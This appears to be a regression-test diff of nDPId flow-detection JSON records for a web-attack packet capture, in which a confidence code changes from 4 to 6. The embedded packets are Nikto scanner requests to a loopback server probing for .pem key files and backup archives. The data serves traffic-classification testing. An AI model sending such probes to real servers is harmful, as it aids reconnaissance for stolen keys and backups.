00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":1,"flow_last_seen":1576420277084,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277084,"pkt":"AAAAAAAAAAAAAAAACABFAADFEhNAAEAGKh5\/AAABfwAAAcOeH5AvZipnVfZObIAYAED+uQAAAQEICp1m\/ISdZvyER0VUIC8xMjdfMF8wXzEucGVtIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277084,"flow_last_seen":1576420277084,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277084,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50078,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277084,"flow_last_seen":1576420277084,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277084,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50078,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":268,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277086,"flow_last_seen":1576420277086,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277086,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50080,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":1,"flow_last_seen":1576420277086,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277086,"pkt":"AAAAAAAAAAAAAAAACABFAADF4EhAAEAGW+h\/AAABfwAAAcOgH5AMu9gyVttcv4AYAED+uQAAAQEICp1m\/IadZvyGR0VUIC8xMjdfMF8wXzEucGVtIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277086,"flow_last_seen":1576420277086,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277086,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50080,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277086,"flow_last_seen":1576420277086,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277086,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50080,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":269,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277087,"flow_last_seen":1576420277087,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277087,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50082,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":1,"flow_last_seen":1576420277087,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277087,"pkt":"AAAAAAAAAAAAAAAACABFAADFByZAAEAGNQt\/AAABfwAAAcOiH5Ca4D9dxFiRCIAYAED+uQAAAQEICp1m\/IedZvyHR0VUIC8xMjdfMF8wXzEuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277087,"flow_last_seen":1576420277087,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277087,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50082,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277087,"flow_last_seen":1576420277087,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277087,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50082,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":270,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277089,"flow_last_seen":1576420277089,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277089,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50084,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":1,"flow_last_seen":1576420277089,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277089,"pkt":"AAAAAAAAAAAAAAAACABFAADFHRdAAEAGHxp\/AAABfwAAAcOkH5BFAiVuc2g7y4AYAED+uQAAAQEICp1m\/ImdZvyJR0VUIC8xMjdfMF8wXzEuZWdnIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":270,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277089,"flow_last_seen":1576420277089,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277089,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50084,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":270,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277089,"flow_last_seen":1576420277089,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277089,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50084,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":271,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277090,"flow_last_seen":1576420277090,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277090,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50086,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":1,"flow_last_seen":1576420277090,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277090,"pkt":"AAAAAAAAAAAAAAAACABFAADCB4tAAEAGNKl\/AAABfwAAAcOmH5BcnD\/ywDswlIAYAED+tgAAAQEICp1m\/IqdZvyKR0VUIC9iYWNrdXAud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":271,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277090,"flow_last_seen":1576420277090,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277090,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50086,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":271,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277090,"flow_last_seen":1576420277090,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277090,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50086,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":272,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277091,"flow_last_seen":1576420277091,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277091,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50088,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":1,"flow_last_seen":1576420277091,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277091,"pkt":"AAAAAAAAAAAAAAAACABFAADCHJtAAEAGH5l\/AAABfwAAAcOoH5BLfyTh3iqQcIAYAED+tgAAAQEICp1m\/IudZvyLR0VUIC9iYWNrdXAud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":272,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277091,"flow_last_seen":1576420277091,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277091,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50088,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":272,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277091,"flow_last_seen":1576420277091,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277091,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50088,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":273,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277093,"flow_last_seen":1576420277093,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277093,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50090,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":1,"flow_last_seen":1576420277093,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277093,"pkt":"AAAAAAAAAAAAAAAACABFAADCo9lAAEAGmFp\/AAABfwAAAcOqH5B0iJuvJFRwg4AYAED+tgAAAQEICp1m\/IydZvyMR0VUIC9iYWNrdXAuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":273,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277093,"flow_last_seen":1576420277093,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277093,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50090,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":273,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277093,"flow_last_seen":1576420277093,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277093,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50090,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277094,"flow_last_seen":1576420277094,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277094,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50092,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":1,"flow_last_seen":1576420277094,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277094,"pkt":"AAAAAAAAAAAAAAAACABFAADCBM1AAEAGN2d\/AAABfwAAAcOsH5CyHDyzBNbaOYAYAED+tgAAAQEICp1m\/I6dZvyOR0VUIC9iYWNrdXAuZWdnIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277094,"flow_last_seen":1576420277094,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277094,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50092,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277094,"flow_last_seen":1576420277094,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277094,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50092,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 